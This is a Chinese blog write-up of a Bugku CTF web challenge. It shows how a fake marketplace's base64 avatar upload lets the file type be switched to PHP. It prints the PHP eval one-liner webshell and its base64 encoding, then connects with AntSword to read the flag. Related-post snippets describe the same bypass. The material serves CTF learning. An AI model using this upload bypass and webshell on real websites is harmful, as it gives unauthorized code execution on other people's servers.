ctf bugku 二手车交易市场

最新推荐文章于 2024-06-21 20:18:52 发布
最新推荐文章于 2024-06-21 20:18:52 发布
阅读量374 收藏
点赞数
分类专栏: ctf 文章标签: ssl apache 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123351785
版权

0x00 环境地址

https://ctf.bugku.com/challenges/detail/id/123.html

在这里插入图片描述

0x01 解题思路

1.1 前台注册账号

1.2 后台头像上传 抓包 上传png后缀图片

在这里插入图片描述
url 对post请求包解码
大致为

data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD/wAARCAIrAisDAREAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKj

发现命名上传的png 后缀图片 最后服务器返回的缺失jpeg后缀
而 请求包中又jpeg 值

说明可能这里是控制后缀的

1.3 修改请求包为txt ,php

上传成功
在这里插入图片描述
php也上传成功
在这里插入图片描述

接下来修改内容
post 请求体中有base64
base64解码 发现 内容确实是经过base64 加密的

1.4 修改内容 上传一句话马

将 一句话 通过base64加密 上传

<?php eval($_REQUEST[a]) ?>

PD9waHAgZXZhbCgkX1JFUVVFU1RbYV0pID8+

在这里插入图片描述
访问页面有报错不怕,一样可以执行
在这里插入图片描述

1.5 蚁剑连接

在这里插入图片描述
找到flag
在这里插入图片描述

LuckyCharm~
关注
专栏目录
Bugku CTF 每日一题 xxx二手交易市场
彼岸花苏陌的博客
01-17 3430
xxx二手交易市场 打开看见是一个网站 所以从零开始测试 1.首先点开一个商品 往下滑有回复框 但是要先注册 所以等注册了再来测试 2.搜索栏也不能用 暂时放过,不过在二手界面发现了一个搜索框 输入一般的sql查询发现好像过滤了# ‘’“”等 3.求购 公告栏也没什么可以利用的 4.发现登录注册框 先爆破一下,不过有验证码爆破不行还要识别验证码,先放放 5.先注册一个账号 看了一下功能,先上个商品看看? 额 要管理员验证 走不通 邮箱签名那块也是有输入验证 再去看看回复框 好像没什么用 再翻了翻 还有上
CTF BugKu平台——Crypto篇刷题记录(后续更新)_抄错的字符 ctf
2401_84281748的博客
04-28 997
前言 记录一下密码学的刷题记录 也是为了更好的巩固自己 基本有的解码 都附有超链接 希望大家能顺利通关 感谢观看!描述: 老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW解码网站:http://www.hiencode.com/railfence.html 解码网站:https://www.splitbrain.org/services/ook解码网站:http://www.hiencode.com
bugku~xxx二手交易市场
o3Ev的博客
03-23 1441
bugku~xxx二手交易市场 打开环境: 页面内的东西很多,这时我们随便点点, 可以看到在url地址栏上出现了id=xxx的字样,我一瞬间想到了sql注入,然后构造了一些payload,发现不行,就继续去找其他的页面了, 我们不难想到这些页面容易发生漏洞的地方-------登陆或者注册页面 这时我们随便先试试注册一个账号,再登陆进去,可以发现来到了用户界面 用户界面一般就可以进行上传头像等,果不其然(真的可以上传头像 既然都可以上传头像了,应该就是文件上传漏洞了,随便上传个图片抓包试试: 可以发现
Bugku-Web-xxx二手交易市场
豆傻小饼干随记
01-18 1714
题目描述 解题思路 先注册一个用户,在用户头像出发现可以上传头像 于是上传一个图片进行抓包,发现它上传的样式是先把图片变成base64格式的 图片转成base64编码的格式如下: data:image/jpeg;base64, 所以这里仿造一下,将文件后缀改为php,再把php使用base64进行编码 在上传后可以看到相应报文中有具体的绝对路径,直接使用蚁剑连接 即可得到flag ...
Bugku-xxx二手交易市场-ctf练习(不用菜刀蚁剑)
lshandel的博客
07-17 912
题目 xxx二手交易市场 描  述: 本人现实碰到的题目,无提示勿问 (这次题目比较牛逼,感觉实战性非常强。。。也挺有难度的) 首先分析一波 突然给我们这么一个网站,那就随便先点点看吧,看到id=的时候dna就动了感觉可能要注入,试了试发现不太行,决定先换个思路,再吸引到我的是注册 注册并且登录之后可以打开个人中心 思路来了,可能能通过图片一句话木马获得shell 然后破解一波 先随便上传一张图片抓个包 这就找到了提交表单的url:http://114.67.246.176:17576/user/upl
bugku web-xx二手交易市场
weixin_46578840的博客
08-14 546
打开得到一个网站,这个页面没什么利用的点,点击登录那里,试了一波弱口令,无果,试一波注入,无果。那就注册一个账号进去看一下吧 注册好后登录,发现可以上传头像,试一下文件上传 抓到这个包,发现是经过bas64编码的 然后把一句话也进行base64编码,然后替换掉内容,发现不行, 这时候看到评论 base64后面加一个空格。也就是前面的应该也不能删除,试了一下,还是不行,这时候注意到 这里有个图片的格式,或许跟这个有关,我们把它换成php,发现,成了, 链接蚁剑,寻找flag,最终在var/www/html
BugKu~二手交易市场:文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1374
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php再上传。上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
BugkuCTF-MISC题虎符
am_03的博客
09-04 493
补充: firework类型:1.处理firework标志的图像;2.常见图片解析:图层分解,帧分解 解题: 拿到一个wim文件,直接解压,也可以binwalk梭出来。得到两个文件夹,先看“左”。 图片文件尾部有额外数据,提取出来是一个加密的压缩包 hint.txt给了提示: hint: password并不单一 password: 王大 王井 王井 这个是当铺密码,解出来是65 68 68,不过换了几类形式提交都不正确,这里的并不单一也不知道是什么意思,然后就扔着不做了,之后才知道要把三组数分别asc
CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 657
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
Bugku CTF之xxx二手交易市场
花城的博客
01-16 2846
Bugku CTF之xxx二手交易市场0x001 wp0x002 结束语 0x001 wp 打开题目,点击进入链接,是一个二手交易市场平台 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MtO8UwwV-1642260210908)(https://huacheng1122.cn/posts/973fb9c2/s1.png#pic_center)] 开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看 根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下
Bugku-web-xxx二手交易市场
最新发布
qq_68457525的博客
06-21 221
cft练习之文件上传漏洞
bugku-web-xxx二手交易市场
qq_75121443的博客
04-09 1402
因为这里发布的填写数据,是可以被我们直接访问到的,如果我们在这些信息中包含一句话木马,是否可以利用菜刀或蚁剑连接呢。这里可以看到,如果头像的一句话木马上传成功,则可以直接访问连接,成功getshell。在当前网站目录下可以看到大量的文件,有一个文件的名称名为flag,打开查看。这里我们抓取上传报文,将这里的image数据给改了,改为一句话木马。好家伙,居然对注释字符进行了过滤,无法闭合,sql注入点不存在。这里看到data这个关键字,即下面的是上面报文加密的状态。发现求购页面是假的,只有二手页面可以点开。
Bugku-学院二手市场
qq_51553814的博客
07-14 499
Bugku-学院二手市场 知识点:文件上传 解题过程 打开靶场,看到的是一个登录界面 刚看到这个登录界面第一想法是post的sql注入。但是想先进去看看,就注册了个账号,登录进去来的这个画面 看到这个画面,我是想在发布二手那里地方,上传图片的同时给他上传一个木马文件,于是来到了一下这个画面,发现和我出想的一样,的确可以上传图片,然后我就渐渐地走向了错误地道路 有两个上传图片点,经过不断地绕过,第一个上传文件点无法绕过,但第二个上传点成功地把木马文件上传去了,接下来只需要去到打开这个网页就可以了,但
bugku xxx二手交易市场
qq_33522311的博客
06-13 163
一、打开靶场,注册一个账号 二、
Bugku xxx二手交易市场
m0_63253040的博客
03-13 201
进入环境 是个交易网站,右上角有登录注册 ,先试试 有个头像上传 ,上传一张图片,发现图片被base64加密,直接修改成base64加密的一句话 同时把image/jpeg改成image/php,放包发送,给了上传路径 打开蚁剑连接 在html里的flag里 ...
bugku-web 二手交易市场-手注(在蚁剑和菜刀没用的时候,我该怎么打天下)
weixin_46184517的博客
05-07 576
在蚁剑和菜刀没用的时候,我该怎么打天下 页面如下 先注册一手看看是否存在xss sql注入之类的 都尝试了,最后发现在修改头像处可以尝试文件上传 因为这里提示只能上传jpg等,php上传不了,发动小脑筋将他绕过 这个图片我们根据开头,判断他是经过base64编码的,解码后为data:image/jpeg;base64, 这里上传类型为jpeg,我们修改为php,并将一句话木马base64编码后拼接到后面可以达到绕过效果 我们通过burp发送到repeater模块,通过回显可以得到它的图片存放路径 然
Bugku旧平台reverse writeup
a370793934的专栏
11-27 938
入门逆向 直接用用ida查看_main函数,r转换成字符 flag{Re_1s_S0_C0OL} Easy_vb 用ida直接打开,alt+t快捷键搜索{ ctrl+t继续搜索能够找到 MCTF{_N3t_Rev_1s_E4ay_} 改为 flag{_N3t_Rev_1s_E4ay_} Easy_Re OD载入直接右键选择中文搜索引擎-->智能s搜索 就可...
CTF条件竞争
夏日 の blog
02-10 2665
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值